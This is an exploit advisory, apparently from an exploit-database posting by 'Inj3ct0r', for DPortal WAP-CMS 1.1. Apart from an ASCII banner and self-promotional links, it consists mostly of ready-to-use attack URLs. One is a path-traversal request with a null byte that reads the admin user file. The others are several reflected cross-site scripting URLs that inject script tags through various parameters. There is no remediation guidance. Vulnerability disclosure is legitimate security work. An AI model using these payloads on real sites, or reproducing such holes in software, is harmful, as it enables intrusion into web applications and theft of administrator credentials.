DPortal WAP-CMS version 1.1 suffers from local file disclosure and cross site scripting vulnerabilities.
5553e7427948757a77a8a2ea31da741cd653c47ec04f2ae330c89abc249def67
==========================================
Dportal wap-cms <= 1.1 (Local Include/XSS)
==========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Site Production: http://wdt.org.ru
Product: DPortal
Version: 1.1
(wap-CMS)
A local reading of files:
http://site.ru/file/opis.php?ver=html&login=Twoster&pas=&katal=Upgrades&file=../../uzer/Admin%00
XSS:
http://site.ru/file/obzor.php?ver=html&pas="><script>alert('Inj3ct0r.com')</script>&katal=Upgrades
http://site.ru/file/obzor.php?ver=html"><script>alert('Inj3ct0r.com')</script>&pas=&katal=Upgrades
http://site.ru/file/obzor.php?ver=html&pas=&katal=Upgrades"><script>alert('Inj3ct0r.com')</script>
http://site.ru/file/opis.php?ver=html&login=Twoster&pas=&katal=Upgrades&file=Upgrade1.zip"><script>alert('Inj3ct0r.com')</script>
http://site.ru/gbyk/say.php?ver=html&pas=&login=&obr=-Twost"><script>alert('Inj3ct0r.com')</script>
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]